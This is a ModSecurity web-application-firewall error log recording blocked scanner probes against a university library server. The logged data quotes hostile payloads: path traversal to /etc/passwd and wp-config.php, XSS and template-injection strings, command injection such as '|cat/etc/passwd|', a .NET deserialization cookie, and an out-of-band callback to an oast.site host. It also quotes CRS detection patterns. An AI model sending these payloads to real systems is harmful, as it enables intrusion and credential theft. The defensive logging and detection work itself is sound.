[Tue Aug 29 11:42:09.407827 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:file: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13IcCo-f0AAAdb7h4AAAAb"]
[Tue Aug 29 11:42:11.363460 2023] [:error] [pid 1886] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:sn: ../../WEB-INF/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/brightmail/servlet/com.ve.kavachart.servlet.ChartStream"] [unique_id "ZO13I8Co-f0AAAdeQzYAAAAQ"]
[Tue Aug 29 11:42:11.432465 2023] [:error] [pid 1884] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13I8Co-f0AAAdcs8wAAAAC"]
[Tue Aug 29 11:42:12.401175 2023] [:error] [pid 1886] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/downloader.php"] [unique_id "ZO13JMCo-f0AAAdeQzkAAAAQ"]
[Tue Aug 29 11:42:14.354805 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13JsCo-f0AAAcsLF0AAAAE"]
[Tue Aug 29 11:42:14.401503 2023] [:error] [pid 1889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:pg: ../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/tarantella/cgi-bin/secure/ttawlogin.cgi/"] [unique_id "ZO13JsCo-f0AAAdhHykAAAAB"]
[Tue Aug 29 11:42:14.424754 2023] [:error] [pid 1889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/filemanager/ajax_calls.php"] [unique_id "ZO13JsCo-f0AAAdhHyoAAAAB"]
[Tue Aug 29 11:42:15.408025 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:cat_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:cat_id: ${system(ls)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/infusions/downloads/downloads.php"] [unique_id "ZO13J8Co-f0AAAdSZK8AAAAX"]
[Tue Aug 29 11:42:17.376468 2023] [:error] [pid 1889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page_slug. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:page_slug: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13KcCo-f0AAAdhHy8AAAAB"]
[Tue Aug 29 11:42:19.350643 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:search_key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:search_key: {{1337*1338}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/search"] [unique_id "ZO13K8Co-f0AAAdb7jIAAAAb"]
[Tue Aug 29 11:42:19.403743 2023] [:error] [pid 1888] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:configuration. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:configuration: o:10:pma_config:1:{s:6:source s:11:/etc/passwd }"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/scripts/setup.php"] [unique_id "ZO13K8Co-f0AAAdgyDgAAAAj"]
[Tue Aug 29 11:42:21.660721 2023] [:error] [pid 1899] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:classes_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:classes_dir: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/classes/phpmailer/class.cs_phpmailer.php"] [unique_id "ZO13LcCo-f0AAAdrEl0AAAAn"]
[Tue Aug 29 11:42:23.398595 2023] [:error] [pid 1882] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/src/addressbook.php"] [unique_id "ZO13L8Co-f0AAAdaZPMAAAAM"]
[Tue Aug 29 11:42:24.428735 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:optpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:optpage: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/src/options.php"] [unique_id "ZO13MMCo-f0AAAbo-cQAAAAi"]
[Tue Aug 29 11:42:25.452087 2023] [:error] [pid 1877] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:mailbox: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/src/search.php"] [unique_id "ZO13McCo-f0AAAdV7bMAAAAa"]
[Tue Aug 29 11:42:26.402893 2023] [:error] [pid 1890] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:where. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:where: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/src/search.php"] [unique_id "ZO13MsCo-f0AAAdi9-AAAAAk"]
[Tue Aug 29 11:42:27.359593 2023] [:error] [pid 1866] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `echo found within ARGS:: `echo cve-2022-33891 | rev`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/doAs"] [unique_id "ZO13M8Co-f0AAAdKXO8AAAAK"]
[Tue Aug 29 11:42:27.453183 2023] [:error] [pid 1855] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:chapter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:chapter: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/src/help.php"] [unique_id "ZO13M8Co-f0AAAc-51cAAAAN"]
[Tue Aug 29 11:42:28.406029 2023] [:error] [pid 1911] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:test-head. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:test-head: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/nextgen-gallery/nggallery.php"] [unique_id "ZO13NMCo-f0AAAd3rGUAAAAe"]
[Tue Aug 29 11:42:29.693558 2023] [:error] [pid 1910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../ found within ARGS:path: /../../Content"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/api/filemanager"] [unique_id "ZO13NcCo-f0AAAd230MAAAAI"]
[Tue Aug 29 11:42:32.416656 2023] [:error] [pid 1890] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at REQUEST_COOKIES:DNNPersonalization. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: MethodName>WriteFile found within REQUEST_COOKIES:DNNPersonalization: <profile><item key=\\x22name1: key1\\x22 type=\\x22System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\\x22><ExpandedWrapperOfFileSyst [hostname "digilibfeb.unla.ac.id"] [uri "/__"] [unique_id "ZO13OMCo-f0AAAdi9-QAAAAk"]
[Tue Aug 29 11:42:32.418997 2023] [:error] [pid 1866] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gf1iyebrzuqoh6.oast.site found within TX:1: cjmnbitjmimt14dgn26gf1iyebrzuqoh6.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/adm/krgourl.php"] [unique_id "ZO13OMCo-f0AAAdKXPkAAAAK"]
[Tue Aug 29 11:42:33.395692 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within XML: file_datafile_name`{}`.pptx| |cat/etc/passwd||a #service_ppt2lp_size720x540"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/main/webservices/additional_webservices.php"] [unique_id "ZO13OcCo-f0AAAQSW00AAAA0"]
[Tue Aug 29 11:42:34.514553 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:file: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/avatar_uploader.pages.inc"] [unique_id "ZO13OsCo-f0AAAdTBAgAAAAY"]
[Tue Aug 29 11:42:40.405257 2023] [:error] [pid 1924] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:query: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/filter/jmol/js/jsmol/php/jsmol.php"] [unique_id "ZO13QMCo-f0AAAeEDvsAAAAy"]
[Tue Aug 29 11:42:40.541810 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php"] [unique_id "ZO13QMCo-f0AAAdb7lQAAAAb"]
[Tue Aug 29 11:42:41.482347 2023] [:error] [pid 1853] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:c: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO13QcCo-f0AAAc92zUAAAAD"]
[Tue Aug 29 11:42:42.366456 2023] [:error] [pid 1882] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:tpl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:tpl: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/badging/badge_print_v0.php"] [unique_id "ZO13QsCo-f0AAAdaZQcAAAAM"]
[Tue Aug 29 11:42:43.381741 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:calculate_attribute_counts[0][query_type]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ] found within ARGS_NAMES:calculate_attribute_counts[0][query_type]: calculate_attribute_counts[0][query_type]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO13Q8Co-f0AAAcvBmkAAAAJ"]
[Tue Aug 29 11:42:46.360224 2023] [:error] [pid 1912] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:path: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/scripts/logdownload.php"] [unique_id "ZO13RsCo-f0AAAd4ax8AAAAj"]
